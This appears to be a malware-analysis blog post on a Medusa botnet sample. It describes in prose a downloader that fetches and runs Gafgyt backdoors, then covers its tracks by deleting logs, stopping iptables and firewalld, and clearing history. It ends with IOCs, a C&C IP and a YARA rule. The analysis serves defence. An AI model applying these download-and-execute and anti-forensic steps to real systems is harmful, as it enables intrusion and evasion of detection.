In the present article we are going to analyze a sample of a Medusa Botnet threat. The script performs cd commands to change directory to /tmp or /var/run or /mnt or /root or / and it performs wget tasks to download the Gafgyt backdoor samples with chmod +x for execution permissions, it executes the threats and delete them with rm -rf command to clear traces. The /mnt directory is used also in contexts of mounting host root directories.
The main downloader script references to the C&C IP address 213.142.148[.]13:
In the tests performed when downloading one of the samples (MIPS architecture threat version) Opera web filter flags it as malicious:
Here are the details of the .mips ELF artifact, from the entropy coefficient (about 5.28) is not packed, the entrypoint is 004002a0:
The network information and details, device details of the victim host are obtained:
The malware makes use of BusyBox toolbox for the malicious purposes, it includes, in tiny version, a lot of Unix common utilites, we can see a reference of the function gethostbyname which can be used to retrieve information and details of a network infrastructure from a given hostname parameter.
We can see a comment to not use Telnet protocol, a reference to the C&C IP address 213.142.148[.]13 on port 25565 (currently ping service):
A resolution is made to Google DNS servers 8.8.8.8 and 8.8.4.4 to gather information about used network interfaces, then the folders /tmp, /var, /var/run, /var/tmp, /var/log are cleared. The malware deletes iptables information and it kills busybox with pkill -9. The services iptables and firewalld are stopped and the commands history are cleared to don't leave traces.
Here we have a reference to routes editing:
Here's the encoding details in the context of sockets raw headers and sessions:
Here is a recap of the extracted strings from the artifact itself, they include details related to the useragents, C&C IP address, credentials. The artifacts performs attacks to servers with weak SSH passwords and it concentrates on DDoS malicious tasks.
The C&C IP address has been registered in Turkey by "HOSTING DUNYAM BILGI ILETISIM TEKNOLOJILERI TICARET LIMITED SIRKETI":
The opened ports and services are port 80 (HTTP with Apache HTTPD 2.4.41), 1012 (which seems to be related to a username credential), 22 (SSH):
The IP address 213.142.148[.]13 is attacking of a lot nginx servers as we can see from recent OSINT detections and evidences:
IOCs:
- f99f9696f79fb7b703dddbc1f299a6622857a75a2cedfa66c0c2b3635572ab1b
- a0b2c839ef20a95b9e5c0642598c15f876ec0adb
- b0dfd9d372133a26c0be904725f78b09
- 8edf7088424c71a87121b3dcad1b45982ebd3937f9ceb27e5bdde81b6c708cc9
- 94562891258e00e58dd98b2a7b295c4945675ced
- 76bc2ecad5860548788a07ce2329c302
- 213.142.148[.]13
- SSH Fingerpint: 7c2ee2007ddfe17e9d15d8e50f92f0a1adc9367f120a51363f279932991e5b43
- fy4fkc1txz22mldwtj4ipcevw5q8aq1 (detail present in the BusyBox session)
YARA rule:
rule MedusaBotnetCnC_20092025 {
meta:
description = "Detects Medusa botnet with C&C information of a sample first seen on 20th September 2025"
condition:
vt.net.url.raw icontains "213.142.148[.]13"
}